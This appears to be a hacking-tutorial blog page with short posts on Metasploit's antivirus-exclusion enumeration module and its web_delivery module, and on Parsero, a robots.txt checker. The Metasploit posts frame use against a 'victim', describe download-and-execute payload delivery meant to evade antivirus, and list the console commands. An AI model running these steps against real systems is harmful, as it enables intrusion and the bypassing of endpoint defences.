Wednesday, 20 January 2016
Friday, 15 January 2016
How to Get Information of Antivirus in Remote Victim PC using Metasploit
Windows Antivirus Exclusions Enumeration
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Module Name
post/windows/gather/enum_av_excluded
msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
...show and set options...
msf post(enum_av_excluded) > run
Thursday, 14 January 2016
Web Delivery metasploit Script
This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
...show and set options...
msf exploit(web_delivery) > exploit
Saturday, 8 August 2015
Parsero - reads the Robots.txt file of a web server
Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines what directories or files hosted on a web server mustn’t be indexed. For example, “Disallow: /portal/login” means that the content on www.example.com/portal/login it’s not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is the way the administrator have to not share sensitive or private information with the search engines.
But sometimes these paths typed in the Disallows entries are directly accessible by the users without using a search engine, just visiting the URL and the Path, and sometimes they are not available to be visited by anybody… Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.
Also, the fact the administrator write a robots.txt, it doesn’t mean that the files or directories typed in the Dissallow entries will not be indexed by Bing, Google, Yahoo… For this reason, Parsero is capable of searching in Bing to locate content indexed without the web administrator authorization. Parsero will check the HTTP status code in the same way for each Bing result.
Source: https://github.com/behindthefirewalls/Parsero
You can get all the latest info about Parsero from http://www.behindthefirewalls.com/search/?q=parsero
Installing
There are three ways to install Parsero easily.
By using setup.py script
sudo setup.py install
By using pip3
sudo apt-get install python3-pip
sudo pip3 install parsero
In Kali Linux
sudo apt-get update
sudo apt-get install parsero
Subscribe to:
Comments (Atom)


